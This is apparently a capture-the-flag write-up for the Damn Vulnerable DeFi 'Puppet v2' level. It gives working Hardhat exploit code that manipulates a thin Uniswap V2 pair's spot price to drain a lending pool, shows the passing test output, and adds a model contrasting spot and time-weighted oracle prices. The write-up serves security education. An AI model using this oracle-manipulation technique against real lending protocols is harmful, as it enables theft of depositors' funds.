web3maxi
The developers of the last lending pool are saying that they've learned the lesson. And just released a new version!
Now they're using a Uniswap v2 exchange as a price oracle, along with the recommended utility libraries. That should be enough.
You start with 20 ETH and 10000 DVT tokens in balance. The new lending pool has a million DVT tokens in balance. You know what to do ;)
References: UniswapV2 documentation, UniswapV2Library.sol
Goal: take all DVT tokens out of the lending pool.
after(async function () {
  /** SUCCESS CONDITIONS */
  // Attacker has taken all tokens from the pool
  expect(await this.token.balanceOf(this.lendingPool.address)).to.be.eq("0");
  expect(await this.token.balanceOf(attacker.address)).to.be.gte(POOL_INITIAL_TOKEN_BALANCE);
});
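This level upgrades Uniswap V1 to Uniswap V2, but the root problem is unchanged: liquidity in the trading pair is so low that the token price can be manipulated easily, and the lending pool's price oracle reads from Uniswap V2. The attack approach is therefore the same as in the previous level.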
it("Exploit", async function () {
  /** CODE YOUR EXPLOIT HERE */
  // Allow the router to spend the attacker's DVT
  await this.token
    .connect(attacker)
    .approve(this.uniswapRouter.address, ATTACKER_INITIAL_TOKEN_BALANCE);
  // Sell all DVT into the thin pair, which moves the price the pool reads
  await this.uniswapRouter
    .connect(attacker)
    .swapExactTokensForETH(
      ATTACKER_INITIAL_TOKEN_BALANCE,
      1,
      [this.token.address, this.uniswapRouter.WETH()],
      attacker.address,
      (await ethers.provider.getBlock("latest")).timestamp * 2,
    );
  // Ask the pool how much WETH it now requires for its whole DVT balance
  const collateral = await this.lendingPool.calculateDepositOfWETHRequired(
    POOL_INITIAL_TOKEN_BALANCE,
  );
  // Wrap that much ETH, approve it as collateral, and borrow everything
  await this.weth.connect(attacker).deposit({ value: collateral });
  await this.weth.connect(attacker).approve(this.lendingPool.address, collateral);
  await this.lendingPool.connect(attacker).borrow(POOL_INITIAL_TOKEN_BALANCE);
});
The test passes:
❯ yarn run puppet-v2
yarn run v1.22.19
warning ../../package.json: No license field
$ yarn hardhat test test/puppet-v2/puppet-v2.challenge.js
warning ../../package.json: No license field
$ /home/runstar/solidityLearn/damn-vulnerable-defi/node_modules/.bin/hardhat test test/puppet-v2/puppet-v2.challenge.js
[Challenge] Puppet v2
✓ Exploit (608ms)
1 passing (4s)
Done in 6.14s.
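Why a reserve-ratio oracle fails on a thin pair, as an added example that is not part of the original post: a BigInt model of the UniswapV2Library `quote` and `getAmountOut` formulas that values the pool's 1,000,000 DVT before and after a single 10,000 DVT sale, next to a simplified time-weighted average. The 100 DVT / 10 WETH reserves, the 30-minute window and the 12-second block are assumptions, not values from this page.

```javascript
// Added example: constant-product pair model using wei-scale BigInt values.
const E18 = 10n ** 18n;

// UniswapV2Library.getAmountOut: x*y=k swap output with the 0.3% fee.
function getAmountOut(amountIn, reserveIn, reserveOut) {
  const inWithFee = amountIn * 997n;
  return (inWithFee * reserveOut) / (reserveIn * 1000n + inWithFee);
}

// UniswapV2Library.quote: conversion at the current (spot) reserve ratio.
function quote(amountA, reserveA, reserveB) {
  return (amountA * reserveB) / reserveA;
}

// Simplified time-weighted average of prices scaled by 1e18.
// observations: [{ price, seconds }], the idea behind V2's cumulative price.
function twap(observations) {
  let acc = 0n;
  let total = 0n;
  for (const o of observations) {
    acc += o.price * o.seconds;
    total += o.seconds;
  }
  return acc / total;
}

function simulate() {
  // Assumed pair reserves (not stated on this page): 100 DVT / 10 WETH.
  let dvt = 100n * E18;
  let weth = 10n * E18;
  const loan = 1_000_000n * E18; // pool balance from the challenge text
  const spotBefore = quote(E18, dvt, weth);
  const before = quote(loan, dvt, weth);

  // One sale of 10,000 DVT (the starting balance in the challenge text).
  const sold = 10_000n * E18;
  const out = getAmountOut(sold, dvt, weth);
  dvt += sold;
  weth -= out;
  const spotAfter = quote(E18, dvt, weth);
  const after = quote(loan, dvt, weth);

  // Assumed window: 1800 s at the old price, 12 s (one block) at the new one.
  const avg = twap([
    { price: spotBefore, seconds: 1800n },
    { price: spotAfter, seconds: 12n },
  ]);
  return { before, after, twapQuote: (loan * avg) / E18 };
}
```

In this model the spot valuation of the pool's DVT falls from 100,000 WETH to under 10 WETH after one trade, while the time-weighted figure stays above 99,000 WETH because the new price has only been in effect for one block of the window.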
Twitter: @0xRunstar